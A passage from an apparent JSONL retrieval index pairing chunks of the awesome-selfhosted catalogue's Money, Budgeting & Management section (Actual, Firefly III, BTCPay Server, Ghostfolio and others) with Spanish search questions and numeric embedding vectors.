Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Actual β€” Local-first personal finance tool based on zero-sum budgeting, supporting synchronization across devices, custom rules, manual transaction importing (from QIF, OFX, and QFX files), and optional automatic synchronization with many banks [MIT, Nodejs/Docker]. Bigcapital β€” Financial accounting and inventory management software for small to medium businesses [AGPL-3.0, Docker]. Bitcart β€” Cryptocurrencies payment processor and development platform [MIT, Docker/Python/Nodejs]. BTCPay Server β€” Bitcoin and other cryptocurrencies payment processor [MIT, C#]. Budget Board β€” Simple app for tracking monthly spending and working towards financial goals [GPL-3.0, Docker]. DePay β€” Accept Web3 Payments directly into your wallet. Peer-to-peer, free, self-hosted & open-source [MIT, Nodejs]. Econumo β€” Budgeting application for managing personal and family finances, supporting multiple currencies, joint accounts, and budgets [MIT, Docker]. ExpenseOwl β€” Extremely simple expense tracker with a beautiful UI [MIT, Go/Docker/K8S].", "indexar": "con quΓ© programa puedo gestionar el presupuesto familiar con soporte para mΓΊltiples monedas?", "v": [0.0608, 0.14186, -0.12069, -0.20953, -0.04824, 0.0716, -0.02338, -0.03504, -0.1642, -0.15291, -0.08548, 0.05072, 0.12137, -0.10555, -0.01027, -0.02719, 0.01309, -0.06776, 0.04283, 0.06649, 0.11974, -0.09434, 0.05301, -0.0338, -0.01848, 0.08817, 0.08484, -0.03115, -0.06961, 0.01576, 0.07786, -0.02629, -0.00599, -0.10884, -0.02789, 0.03684, 0.0425, 0.12582, -0.01261, -0.10065, 0.1073, -0.06252, 0.03266, -0.0283, 0.04663, -0.04416, -0.01899, 0.15776, 0.02201, -0.08302, -0.00989, -0.13363, 0.01991, 0.09404, 0.03674, -0.09148, 0.06182, -0.10152, -0.13745, -0.01922, -0.05725, 0.03833, -0.00495, 0.03193, -0.11648, 0.05935, 0.0194, 0.00097, -0.01424, -0.03109, -0.05463, 0.07526, -0.02348, 0.07401, -0.01847, 0.02494, 0.06994, -0.07348, 0.03458, -0.03525, -0.07647, 0.00908, 0.03457, 0.13189, -0.044, -0.05091, 0.01944, -0.01199, 0.0539, 0.04185, -0.11152, -0.02362, -0.08996, 0.04182, -0.04353, 0.00599, -0.00526, 0.0223, -0.01502, 0.03396, -0.00405, -0.07396, -0.16522, 0.10378, -0.0186, 0.11139, 0.10006, -0.01523, -0.06054, -0.03936, -0.0497, 0.03004, -0.04159, 0.02835, -0.0899, 0.04462, 0.03841, 0.05335, 0.13214, -0.01905, 0.00309, 0.0252, -0.02874, 0.08523, 0.13723, 0.01186, 0.02341, 0.06014, 0.07066, 0.10366, -0.07918, 0.05781, 0.00107, 0.00149, -0.03387, 0.01561, 0.03441, -0.03242, -0.04805, -0.07024, 0.02064, 0.02276, 0.01679, -0.02557, 0.11986, -0.04709, 0.02731, -0.05767, -0.01009, 0.04214, 0.1037, -0.01047, 0.04448, 0.0928, -0.04458, -0.01026, 0.00382, 0.08089, -0.13641, 0.05428, -0.03226, -0.00862, 0.00551, -0.0651, -0.01121, -0.05826, -0.09733, 0.06723, 0.05527, 0.05243, -0.01171, 0.08121, 0.07277, -0.01455, 0.04717, -0.13564, 0.02571, -0.13907, 0.03337, -0.07069, -0.06221, 0.0358, -0.004, 0.00708, -0.04126, -0.03093, 0.03466, 0.10655, 0.00809, -0.06823, 0.01075, 0.07207, -0.06169, 0.0074, 0.0172, -0.06722, -0.00653, -0.01773, -0.00686, 0.01814, 0.02159, 0.05476, 0.03004, -0.07122, 0.00577, 0.10836, -0.05068, -0.02739, -0.00112, 0.09591, 0.05128, -0.00735, 0.0587, 0.00459, -0.00432, 0.03981, 0.01818, 0.01537, 0.01654, 0.01852, 0.01375, 0.03381, 0.04006, -0.00164, 0.01241, -0.0405, 0.02306, -0.01028, 0.04259, -0.0117, 0.01678, 0.0206, -0.06718, -0.00665, -0.01129, 0.04145, 0.02954, -0.06657, -0.06585, 0.00975, -0.0003, 0.05495, -0.04551, -0.01299, -0.05377, 0.0034, -0.07524, 0.0418, 0.00655, 0.00061, 0.01699, 0.09619, 0.01707, -0.02718, 0.01637, -0.01827]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Actual β€” Local-first personal finance tool based on zero-sum budgeting, supporting synchronization across devices, custom rules, manual transaction importing (from QIF, OFX, and QFX files), and optional automatic synchronization with many banks [MIT, Nodejs/Docker]. Bigcapital β€” Financial accounting and inventory management software for small to medium businesses [AGPL-3.0, Docker]. Bitcart β€” Cryptocurrencies payment processor and development platform [MIT, Docker/Python/Nodejs]. BTCPay Server β€” Bitcoin and other cryptocurrencies payment processor [MIT, C#]. Budget Board β€” Simple app for tracking monthly spending and working towards financial goals [GPL-3.0, Docker]. DePay β€” Accept Web3 Payments directly into your wallet. Peer-to-peer, free, self-hosted & open-source [MIT, Nodejs]. Econumo β€” Budgeting application for managing personal and family finances, supporting multiple currencies, joint accounts, and budgets [MIT, Docker]. ExpenseOwl β€” Extremely simple expense tracker with a beautiful UI [MIT, Go/Docker/K8S].", "indexar": "quΓ© alternativa libre existe para procesar pagos cripto directamente a la billetera?", "v": [0.0776, -0.0024, -0.24111, 0.00491, 0.00668, -0.09637, 0.13959, -0.09752, -0.24827, -0.16025, -0.02913, -0.09997, -0.01005, 0.0435, 0.16653, -0.10735, -0.09322, 0.00486, 0.15286, -0.11677, 0.00656, -0.1125, -0.00559, -0.11237, -0.05701, 0.01648, 0.00488, 0.02528, -0.10885, 0.12563, 0.08952, -0.06829, 0.10067, -0.06903, 0.02465, 0.02834, 0.05831, 0.0213, 0.07328, 0.03849, 0.1402, 0.02472, 0.10101, 0.03971, -0.0463, -0.09462, 0.0097, 0.08457, 0.02426, -0.06688, -0.00722, -0.05894, -0.11262, 0.09222, 0.0138, -0.05818, 0.06275, -0.09686, -0.03642, -0.00935, -0.05852, 0.11833, 0.11919, 0.00351, -0.15133, 0.07705, -0.01813, 0.00941, -0.03007, 0.10358, -0.03672, 0.0662, 0.01697, 0.09192, 0.00299, -0.00529, -0.01275, -0.03136, 0.02964, 0.04474, -0.01025, -0.02068, 0.03968, 0.10274, -0.08772, -0.03883, 0.06332, -0.07706, 0.05112, 0.09801, -0.04414, 0.05123, 0.09433, 0.05974, 0.00047, 0.00555, -0.03871, -0.05296, -0.04037, 0.07517, 0.02725, 0.00927, -0.08973, 0.04903, 0.02997, 0.03501, 0.05179, 0.06613, -0.00276, -0.04869, 0.00605, 0.03129, -0.00112, 0.0073, -0.06567, -0.01884, 0.03668, 0.07416, 0.00305, 0.00025, -0.02835, -0.0006, -0.02809, -0.04467, 0.06058, 0.01577, -0.03966, 0.05611, -0.04055, 0.03296, -0.03802, -0.02406, -0.08421, -0.06391, -0.05541, -0.02164, 0.03109, -0.03269, 0.06784, 0.05989, 0.08427, -0.0003, -0.00833, 0.00909, 0.11363, -0.02567, 0.02889, -0.01174, -0.08082, -0.01666, 0.00995, -0.03547, -0.06591, 0.07003, -0.0775, -0.04117, -0.00513, -0.05989, -0.11428, 0.09274, 0.00884, -0.03249, -0.04018, -0.02478, -0.08023, -0.04185, 0.01173, 0.0242, -0.10585, 0.03841, 0.04351, 0.10069, 0.06977, -0.08666, 0.04681, -0.05859, 0.0054, -0.11773, 0.06907, -0.04953, 0.03031, 0.01592, -0.08102, -0.03994, -0.01806, 0.02265, 0.01633, 0.06286, -0.01959, 0.08747, 0.01623, 0.01136, -0.09074, -0.01266, -0.04067, -0.00973, -0.00282, -0.07351, -0.07229, -0.0056, -0.00125, 0.08614, 0.02486, 0.03303, -0.06602, 0.03597, -0.06349, 0.00662, -0.03925, 0.06416, 0.06118, 0.00455, 0.06966, -0.03354, 0.01261, -0.01136, 0.00061, -0.01316, -0.03964, -0.00339, 0.00115, 0.01732, 0.01219, -0.00349, 0.0504, 0.06789, 0.00178, 0.05039, -0.03295, -0.02189, 0.02243, 0.03711, -0.03465, 0.01284, -0.0202, 0.02603, -0.02264, -0.02685, -0.02671, 0.03282, 0.06127, 0.05716, -0.0441, 0.01062, -0.00747, 0.02336, -0.05349, -0.05802, -0.07021, -0.05192, -0.01778, 0.01498, 0.03278, 0.05117, 0.01955, 0.0216]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: ezbookkeeping β€” A lightweight personal bookkeeping app hosted by yourself [MIT, Go/Docker]. Family Accounting Tool β€” Web-based finance management tool for partners with partially shared expenses [Apache-2.0, Scala]. Fava β€” Web frontend of Beancount, a text based double-entry accounting system [MIT, Python]. Firefly III β€” Firefly III is a modern financial manager. It helps you to keep track of your money and make budget forecasts. It supports credit cards, has an advanced rule engine and can import data from many banks [AGPL-3.0, PHP/Docker]. FOSSBilling β€” Hosting and billing automation. Integrates with WHM, CWP, cPanel and HestiaCP. Full API and easily extensible [Apache-2.0, PHP/Docker]. Galette β€” Membership management web application aimed towards non profit organizations [GPL-3.0, PHP]. Ghostfolio β€” Wealth management software to keep track of stocks, ETFs and cryptocurrencies [AGPL-3.0, Docker/Nodejs]. GRR β€” Assets management and booking for small/medium companies [GPL-2.0, PHP].", "indexar": "quΓ© programa es ligero para llevar el control de mis gastos personales en casa", "v": [-0.05866, 0.12421, -0.05773, -0.14961, 0.00343, -0.0462, 0.04001, 0.05356, -0.11711, -0.10768, -0.08512, -0.06232, 0.03213, -0.09816, -0.00592, -0.079, 0.08873, -2e-05, 0.06771, 0.04302, -0.11794, 0.00529, 0.01407, -0.00506, -0.09041, 0.02192, 0.12259, -0.07382, -0.16649, 0.14578, -0.03445, 0.00466, 0.03694, -0.04374, 0.03204, 0.02676, 0.06702, 0.01338, 0.06908, 0.08531, 0.17596, 0.00656, 0.06158, 0.03706, 0.07253, -0.09297, 0.03404, 0.09286, 0.01061, -0.03, -0.06696, 0.0185, 0.07035, 0.09113, 0.08238, -0.06497, -0.064, -0.14332, 0.04629, 0.02714, -0.06415, -0.02339, 0.12275, 0.14835, -0.03561, 0.01527, 0.00242, -0.03601, -0.05302, -0.05962, -0.025, 0.00439, -0.05574, 0.05027, -0.06871, -0.02008, -0.01967, -0.00156, 0.09874, -0.07706, -0.03088, -0.11867, -0.06412, 0.0913, -0.08121, -0.02786, 0.03685, -0.05034, 0.07182, -0.00858, 0.0178, -0.0321, 0.00816, 0.07835, -0.02451, 0.05102, 0.08901, 0.06241, -0.00064, 0.0815, 0.06045, -0.05618, -0.039, 0.13143, -0.05241, 0.08185, 0.09781, 0.0365, -0.08473, -0.03399, -0.0769, 0.10381, -0.04073, 0.02217, -0.02213, 0.058, -0.04898, -0.01896, 0.06359, -0.09865, -0.1123, 0.02527, 0.07618, 0.02673, 0.0454, -0.05149, 0.0381, 0.03742, 0.01563, 0.10209, 0.03421, -0.05943, 0.04945, 0.01551, 0.01045, -0.07301, -0.13736, -0.01755, 0.00363, -0.03835, -0.00213, 0.04471, -0.00068, -0.011, 0.08878, -0.09065, -0.0793, 0.06267, -0.06434, 0.10737, 0.01857, 0.04512, 0.04669, 0.03398, 0.03496, 0.01231, -0.02354, 0.06155, -0.04407, -0.01246, -0.0665, 0.04011, -0.01187, -0.09112, 0.09642, -0.03991, 0.05897, 0.07037, -0.03796, 0.09912, -0.06737, 0.08167, -0.02937, -0.04776, 0.04769, -0.12281, 0.01036, -0.12534, -0.01789, -0.08062, -0.05884, 0.11667, 0.0085, 0.00606, 0.00418, 0.04948, -0.03801, 0.07195, 0.05643, -0.05002, -0.11111, -0.00058, 0.01591, 0.04916, -0.03028, 0.0208, -0.06441, -0.02198, 0.0541, 0.03361, -0.00032, -0.02803, 0.07026, 0.0268, 0.02396, 0.05837, -0.02934, -0.04162, 0.04657, 0.13183, -0.00049, -0.0143, 0.05335, 0.0092, -0.00036, 0.08876, 0.0123, 0.01174, 0.06549, 0.10447, 0.08591, 0.00739, -0.03252, -0.00689, 0.05394, -0.03022, 0.02172, -0.02884, 0.00651, 0.00369, -0.03128, -0.07616, 0.00847, -0.02088, 0.04447, -0.02052, 0.01935, -0.05474, -0.04449, -0.02058, -0.03971, 0.11707, 0.01568, -0.03168, -0.03074, -0.00028, -0.06188, 0.04419, 0.00745, 0.0372, 0.04409, 0.03412, 0.01068, 0.00873, 0.01492, 0.03637]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: ezbookkeeping β€” A lightweight personal bookkeeping app hosted by yourself [MIT, Go/Docker]. Family Accounting Tool β€” Web-based finance management tool for partners with partially shared expenses [Apache-2.0, Scala]. Fava β€” Web frontend of Beancount, a text based double-entry accounting system [MIT, Python]. Firefly III β€” Firefly III is a modern financial manager. It helps you to keep track of your money and make budget forecasts. It supports credit cards, has an advanced rule engine and can import data from many banks [AGPL-3.0, PHP/Docker]. FOSSBilling β€” Hosting and billing automation. Integrates with WHM, CWP, cPanel and HestiaCP. Full API and easily extensible [Apache-2.0, PHP/Docker]. Galette β€” Membership management web application aimed towards non profit organizations [GPL-3.0, PHP]. Ghostfolio β€” Wealth management software to keep track of stocks, ETFs and cryptocurrencies [AGPL-3.0, Docker/Nodejs]. GRR β€” Assets management and booking for small/medium companies [GPL-2.0, PHP].", "indexar": "con quΓ© puedo gestionar las cuentas compartidas entre mi pareja y yo", "v": [0.02328, 0.24832, -0.06426, -0.05487, 0.01752, -0.02361, 0.04825, -0.02895, -0.11068, -0.12504, -0.0692, -0.01476, 0.0282, 0.05924, -0.02109, -0.03145, 0.12149, 0.07107, 0.02363, -0.01355, 0.04193, -0.04386, 0.06781, -0.06523, -0.02134, -0.02232, 0.17032, -0.05237, -0.08964, 0.08085, 0.02858, -0.01754, -0.0404, 0.0501, 0.06658, 0.03238, -0.0347, 0.09622, 0.03422, -0.08291, -0.02621, 0.03182, 0.01427, -0.0473, 0.09789, 0.02177, -0.11242, 0.02495, 0.0168, 0.00351, -0.15351, 0.01987, -0.13385, 0.05779, -0.12318, -0.05726, 0.11703, -0.01795, 0.00445, 0.00843, -0.05687, -0.02985, 0.07733, 0.15677, -0.05746, -0.01187, 0.09195, 0.06934, -0.06221, 0.12139, -0.04383, 0.10787, -0.13156, -0.04027, -0.04027, -0.00331, 0.11654, -0.03447, -0.06891, -0.06465, 0.04059, -0.10677, 0.02971, 0.0768, 0.04875, -0.06499, 0.01331, -0.00188, 0.02325, 0.01372, -0.00562, -0.16201, -0.06164, -0.0902, -0.02991, 0.04524, 0.02482, -0.00953, -0.08808, -0.04402, 0.07786, 0.07897, -0.12402, 0.07067, -0.13695, 0.10591, 0.06516, -0.01062, 0.02397, -0.03887, 0.05105, 0.03669, -0.03697, -0.04448, -0.04099, 0.04507, -0.09631, 0.01912, 0.04939, 0.02717, -0.05509, -0.10167, 0.04812, 0.06733, 0.01417, -0.09017, 0.01623, 0.12144, 0.01589, 0.077, -0.13723, -0.03964, -0.01527, -0.0651, 0.05472, 0.0048, -0.09451, 0.04075, -0.04216, -0.0833, -0.05994, 0.052, -0.0391, -0.05993, 0.03854, -0.00708, -0.00169, -0.02221, 0.01937, 0.03953, 0.05462, -0.03932, -0.02761, 0.01999, -0.14579, 0.02593, 0.07649, -0.02562, -0.08993, -0.01814, -0.03812, 0.00447, -0.01654, 0.01411, 0.16107, -0.02525, -0.05909, -0.00397, 0.01233, -0.01684, -0.01223, 0.07636, -0.00401, 0.00818, 0.0406, -0.12291, 0.02598, -0.15656, -0.02713, -0.01299, -0.01512, -0.05775, 0.04072, 0.04256, -0.03624, 0.03675, -0.06607, 0.04473, -0.01822, 0.0449, 0.02517, 0.01155, 0.0672, -0.02382, 0.03736, -0.07312, 0.01559, -0.00131, 0.00308, 0.01872, 0.02977, -0.00685, 0.03114, 0.01814, -0.00506, 0.01237, -0.08451, 0.08798, 0.01696, -0.07289, 0.00126, -0.02953, 0.01463, -0.09298, -0.1024, 0.01877, 0.00225, -0.01411, 0.0745, 0.03659, 0.02233, -0.01145, 0.00665, -0.02802, 0.07586, 0.01225, 0.02042, 0.00464, 0.01456, 0.01057, -0.01981, 0.02743, -0.00199, 0.0511, 0.05213, -0.00442, 0.01751, -0.10622, 0.00708, -0.02541, 0.00515, 0.05525, 0.03896, -0.02858, -0.11144, 0.02462, -0.04358, -0.00836, -0.05623, -0.03201, 0.01687, -0.02232, 0.03861, -0.02854, 0.01392, 0.0046]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: ezbookkeeping β€” A lightweight personal bookkeeping app hosted by yourself [MIT, Go/Docker]. Family Accounting Tool β€” Web-based finance management tool for partners with partially shared expenses [Apache-2.0, Scala]. Fava β€” Web frontend of Beancount, a text based double-entry accounting system [MIT, Python]. Firefly III β€” Firefly III is a modern financial manager. It helps you to keep track of your money and make budget forecasts. It supports credit cards, has an advanced rule engine and can import data from many banks [AGPL-3.0, PHP/Docker]. FOSSBilling β€” Hosting and billing automation. Integrates with WHM, CWP, cPanel and HestiaCP. Full API and easily extensible [Apache-2.0, PHP/Docker]. Galette β€” Membership management web application aimed towards non profit organizations [GPL-3.0, PHP]. Ghostfolio β€” Wealth management software to keep track of stocks, ETFs and cryptocurrencies [AGPL-3.0, Docker/Nodejs]. GRR β€” Assets management and booking for small/medium companies [GPL-2.0, PHP].", "indexar": "busco una herramienta web para administrar inversiones en acciones y criptomonedas", "v": [0.15365, -0.05041, -0.06431, -0.20134, 0.11726, -0.09606, -0.01277, -0.10126, -0.12688, -0.07676, 0.00196, -0.09567, -0.08017, -0.01503, 0.09313, 0.00096, 0.0247, -0.13237, 0.04763, 0.00795, 0.10844, 0.00111, -0.07687, 0.11189, -0.05329, 0.01101, -0.12467, -0.10993, -0.0863, 0.0151, 0.03027, -0.05842, 0.0314, 0.01425, -0.02692, -0.16035, 0.00272, 0.03647, 0.06965, 0.06998, -0.00177, 0.03631, -0.02647, -0.06789, 0.02733, -0.03315, 0.05913, -0.09431, 0.11607, -0.03368, -0.0214, -0.09666, -0.16794, -0.02792, 0.10128, -0.00216, 0.11119, -0.14364, -0.03694, -0.10337, -0.2106, 0.06761, -0.01432, 0.03326, -0.12426, 0.03146, 0.02153, 0.06727, -0.09142, 0.13868, 0.06079, 0.06144, -0.06411, 0.08891, 0.10358, -0.0112, 0.128, 0.06034, -0.05955, -0.04342, -0.09803, -0.02847, -0.04198, 0.1012, -0.04239, -0.14074, 0.03506, -0.04801, 0.04764, -0.0074, -0.06932, -0.01991, 0.01228, -0.06422, -0.0422, 0.01612, 0.01999, -0.06419, 0.01072, -0.03562, 0.10702, 0.06609, -0.12775, 0.02556, 0.0163, 0.07046, -0.07915, 0.06657, -0.1214, -0.02638, 0.02727, 0.07471, 0.04034, -0.06121, 0.01828, 0.1198, -0.04191, -0.04974, 0.01393, -0.0442, -0.07769, -0.03908, -0.06999, 0.01815, -0.00626, -0.02504, -0.11712, 0.00647, -0.0053, -0.05689, -0.01822, -0.00894, -0.10862, -0.01228, -0.04234, 0.0177, -0.02839, -0.03967, -0.01616, -0.01142, 0.04523, 0.00272, 0.00739, -0.03827, 0.11432, 0.10033, 0.03971, 0.01162, -0.01247, -0.02242, 0.08573, -0.07427, -0.01569, 0.04294, -0.07031, -0.05758, -0.01047, -0.03461, -0.11233, 0.0984, -4e-05, -0.02877, 0.05356, -0.0312, -0.07292, -0.0317, -0.03415, 0.08377, -0.01773, 0.02672, 0.03729, 0.06212, 0.06961, -0.00513, 0.05416, -0.04208, -0.06067, -0.0215, 0.04026, -0.09464, -0.00542, -0.03946, 0.0126, 0.02949, 0.05859, -0.0212, 0.04085, 0.0434, -0.06868, 0.06606, 0.00834, -0.02115, -0.07314, 0.02712, 0.03022, 0.001, 0.006, -0.05359, -0.00596, 0.00234, -0.01836, 0.01087, -0.04262, -0.04583, -0.00796, 0.08839, -0.07673, -0.04334, -0.05003, 0.05311, 0.03159, 0.04005, 0.0235, 0.00562, 0.01428, -0.06563, 0.02687, 0.05265, -0.05355, 0.00202, -0.01153, -0.04277, 0.00425, -0.01526, 0.00497, 0.04512, -0.01813, 0.01315, -0.00421, 0.0103, -0.01245, 0.00286, -0.0479, 0.0248, 0.00547, -0.0123, 0.01015, -0.01805, -0.06198, 0.01927, -0.01563, 0.00365, 0.00886, 0.00343, -0.03425, -0.01538, 0.00296, 0.00489, -0.06559, -0.00689, 0.02332, -0.00247, 0.08154, -0.0019, 0.0033, 0.00235]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: HyperSwitch β€” Payment switch to make payments fast, reliable and affordable. Connect with multiple payment processors and route traffic effortlessly, all with a single API integration [⚠, Apache-2.0, Docker/Rust]. IHateMoney β€” Manage your shared expenses, easily [BSD-3-Clause, Docker/Python]. InvoicePlane β€” Manage quotes, invoices, payments and customers for your small business [MIT, PHP]. InvoiceShelf β€” Track expenses, payments & create professional invoices & estimates (fork of Crater) [AGPL-3.0, PHP/Docker]. Kill Bill β€” Subscription billing & payments platform. Have access to real-time analytics and financial reports [Apache-2.0, Java/Docker]. Kresus β€” Personal finance manager [AGPL-3.0, Nodejs/Docker]. Lago β€” Metering and usage-based billing [AGPL-3.0, Docker]. monetr β€” Budgeting application focused on planning for recurring expenses [FSL-1.1-MIT, Docker/K8S]. Mybucks.online β€” Secure, browser-based, password-only self-custodial cryptocurrency wallet [MIT, Nodejs].", "indexar": "ΒΏcon quΓ© puedo gestionar las cuotas recurrentes de forma eficiente?", "v": [0.06264, 0.13656, -0.06902, 0.00595, 0.1987, -0.06861, 0.07571, 0.04623, -0.18296, -0.08771, -0.13784, -0.07456, -0.03898, 0.05872, 0.03301, 0.08968, 0.11057, -0.0837, -0.11765, -0.02045, 0.02511, -0.2579, 0.06975, 0.01542, -0.02563, 0.05692, 0.16601, -0.04206, -0.06001, 0.05888, 0.04372, 0.04925, 0.09731, -0.05019, -0.06213, 0.13165, -0.07003, 0.13355, -0.01834, -0.03852, -0.04995, 0.04589, -0.07877, -0.07675, 0.14364, -0.08806, -0.08213, 0.01734, 0.04562, 0.0304, -0.16368, -0.10022, -0.00265, -0.0134, -0.05687, -0.03209, -0.04946, 0.00163, 0.0327, -0.12479, 0.06362, 0.04967, 0.01289, 0.08765, 0.0085, 0.03194, 0.05758, -0.04026, -0.01929, 0.08904, -0.01711, 0.01956, -0.03554, 0.06119, 0.08314, 0.0452, 0.02289, 0.03952, 0.1128, 0.02458, 0.03767, 0.03601, -0.10037, 0.02068, 0.04582, -0.00568, -0.0001, -0.05717, 0.01647, -0.04715, -0.01798, -0.10751, 0.00942, -0.0192, -0.04464, 0.03004, -0.04049, 0.03572, -0.03819, 0.03635, -0.03028, 0.05926, -0.06212, 0.11191, -0.0119, 0.04675, -0.06993, -0.04765, -0.05177, -0.03736, -0.07044, -0.07996, -0.09353, -0.04654, 0.02762, 0.07238, -0.00217, -0.02282, -0.00879, 0.00698, -0.07041, -0.00804, 0.0203, 0.01893, 0.09286, 0.00038, 0.07873, 0.06512, -0.08175, 0.02277, -0.10188, 0.01462, 0.02171, -0.04416, 0.0091, -0.01546, -0.02495, -0.01543, -0.02092, -0.17343, 0.0035, 0.02827, -0.05834, -0.04205, 0.06143, -0.10694, 0.02712, -0.0719, -0.00718, 0.04785, 0.06076, -0.06053, 0.06484, 0.04, -0.03109, 0.03061, 0.00142, -0.05211, -0.09502, 0.0249, -0.03603, -0.02244, -0.00555, 0.1084, 0.00682, -0.01602, -0.04068, 0.03741, 0.00074, 0.07779, -0.02156, 0.00644, 0.00971, -0.03626, 0.06033, -0.05808, -0.05544, -0.11537, 0.05221, 0.01829, -0.02532, 0.01127, -0.00469, -0.02179, -0.05406, -0.03849, -0.04786, 0.11218, -0.02562, 0.02591, 0.05992, -0.01362, 0.04546, -0.06572, -0.00986, -0.1143, -0.03773, -0.06268, -0.06967, -0.00251, -0.07525, 0.00495, 0.0207, 0.04672, 0.0481, -0.02399, -0.09639, 0.09145, 0.05729, 0.00522, -0.01438, 0.03742, 0.10042, 0.00188, -0.02309, 0.0009, -0.01163, -0.07585, 0.02433, -0.02525, 0.02937, 0.04132, 0.04164, -0.02038, 0.07583, 0.00079, 0.01066, 0.05663, 0.01783, 0.02561, -0.03647, 0.08131, 0.00582, 0.05803, -0.01381, -0.0406, 0.02449, -0.08884, -0.04946, 0.02975, 0.01988, -0.0079, 0.04544, 0.03743, -0.01949, 0.01457, -0.10793, -0.00308, -0.03541, 0.0043, 0.01529, -0.01091, -0.03341, 0.03542, 0.02621, -0.0226]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: HyperSwitch β€” Payment switch to make payments fast, reliable and affordable. Connect with multiple payment processors and route traffic effortlessly, all with a single API integration [⚠, Apache-2.0, Docker/Rust]. IHateMoney β€” Manage your shared expenses, easily [BSD-3-Clause, Docker/Python]. InvoicePlane β€” Manage quotes, invoices, payments and customers for your small business [MIT, PHP]. InvoiceShelf β€” Track expenses, payments & create professional invoices & estimates (fork of Crater) [AGPL-3.0, PHP/Docker]. Kill Bill β€” Subscription billing & payments platform. Have access to real-time analytics and financial reports [Apache-2.0, Java/Docker]. Kresus β€” Personal finance manager [AGPL-3.0, Nodejs/Docker]. Lago β€” Metering and usage-based billing [AGPL-3.0, Docker]. monetr β€” Budgeting application focused on planning for recurring expenses [FSL-1.1-MIT, Docker/K8S]. Mybucks.online β€” Secure, browser-based, password-only self-custodial cryptocurrency wallet [MIT, Nodejs].", "indexar": "ΒΏhay alguna alternativa libre para crear facturas profesionales y cobrar online?", "v": [0.02789, 0.08586, -0.11549, -0.08819, -0.0184, -0.15359, 0.13032, 0.09547, -0.2056, -0.10914, -0.10662, -0.21216, 0.1143, -0.02732, 0.0094, -0.02235, 0.03874, -0.08085, 0.16164, 0.04057, 0.00708, 0.01214, -0.04795, -0.12643, -0.09603, -0.08884, -0.02993, -0.08307, -0.08213, 0.10442, 0.15112, 0.00891, 0.04197, -0.01912, 0.05515, 0.09569, 0.0825, 0.08025, 0.12444, -0.01273, 0.20981, 0.00039, -0.01062, 0.06652, 0.02531, -0.02152, -0.10352, 0.03884, 0.00883, 0.15433, -0.01469, -0.07086, -0.07177, 0.01527, -0.09587, -0.02789, 0.01127, -0.08722, -0.03375, -0.08477, 0.02293, 0.11965, -0.0044, 0.05684, 0.02236, -0.02024, 0.05961, 0.02735, 0.02336, 0.06715, -0.08135, -0.03464, -0.01432, -0.03413, -0.01237, 0.02916, -0.0284, -0.10544, -0.02949, 0.05444, 0.01622, -0.04618, -0.04012, 0.02512, -0.09214, 0.03817, 0.02053, -0.05583, 0.06292, 0.05529, 0.03453, 0.06073, 0.00163, 0.11312, -0.07854, 0.04488, 0.07706, -0.04773, -0.02474, 0.06866, -0.04325, 0.04027, -0.04982, -0.00953, 0.00691, 0.05765, -0.01006, -0.02567, 0.00536, 0.04502, -0.00052, 0.04977, 0.03884, 0.01756, 0.00459, -0.05875, 0.03914, 0.10532, -0.04533, 0.11935, 0.1395, -0.01322, 0.04638, -0.06173, 0.03822, 0.02455, 0.0028, 0.12694, -0.04491, 0.1206, -0.00058, -0.03594, -0.03788, -0.13787, -0.02535, -0.00783, 0.01758, -0.0277, 0.01369, 0.02888, -0.06233, 0.00546, -0.06212, -0.03757, -0.00041, -0.06787, -0.04399, -0.08288, -0.08948, -0.00281, -0.04252, 0.03926, -0.0406, 0.10056, -0.03127, 0.04832, 0.03442, 0.02418, -0.07566, 0.05078, 0.02277, -0.01493, 0.03245, -0.02639, -0.07045, -0.02231, -0.0621, 0.02493, 0.01689, 0.05351, 0.01324, 0.0205, -0.00409, -0.09064, 0.09321, -0.04218, 0.01096, -0.08924, 0.03602, -0.02267, -0.00994, -0.01248, -0.06071, -0.05989, -0.01085, 0.06576, 0.03463, 0.01966, 0.01143, 0.06352, -0.00156, 0.01513, -0.11673, 0.02544, -0.03229, -0.00475, -0.01949, -0.05291, -0.05302, 0.03357, -0.05315, -0.06293, 0.02265, 0.03251, -0.04456, -0.06635, -0.0413, 0.04247, 0.04571, 0.0336, 0.04205, -0.03131, 0.00907, -0.10999, 0.0012, -0.0149, 0.02498, -0.06068, -0.02283, 0.00622, 0.01087, 0.00191, -0.091, 0.01763, 0.09113, 0.07005, 0.02079, 0.07014, -0.04043, -0.02848, 0.00287, -0.02812, -0.03583, 0.02879, -0.07429, 0.00129, 0.04716, -0.00147, -0.04366, 0.05208, 0.04424, 0.07151, 0.02884, 